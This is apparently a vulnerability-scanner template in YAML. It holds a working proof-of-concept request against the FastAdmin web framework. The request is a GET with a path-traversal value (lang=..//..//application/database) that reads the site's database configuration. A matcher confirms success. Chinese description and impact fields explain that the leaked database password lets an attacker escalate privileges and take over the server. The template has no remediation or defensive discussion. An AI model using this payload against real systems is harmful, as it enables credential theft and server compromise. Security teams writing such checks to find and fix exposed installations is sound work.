31 lines
641 B
YAML
31 lines
641 B
YAML
keyword: fastadmin
|
|
name: fastadmin任意文件读取漏洞
|
|
description: |
|
|
该漏洞会造成数据库密码泄露
|
|
requests:
|
|
path: "/index/ajax/lang?lang=..//..//application/database"
|
|
method: GET
|
|
headers:
|
|
User-agent:
|
|
Content-length:
|
|
Accept:
|
|
Content-type:
|
|
Accept-Encoding:
|
|
Cookie:
|
|
Referer:
|
|
X-Forwarded-For:
|
|
body-raw: |-
|
|
|
|
response:
|
|
path: ""
|
|
status-code: 200
|
|
body: "database"
|
|
headers:
|
|
Server:
|
|
Content-type:
|
|
Content-length:
|
|
Date:
|
|
Connection:
|
|
impact: |
|
|
数据库密码泄露过后,攻击者可获取数据库操作权限进行提权然后攻陷服务器。
|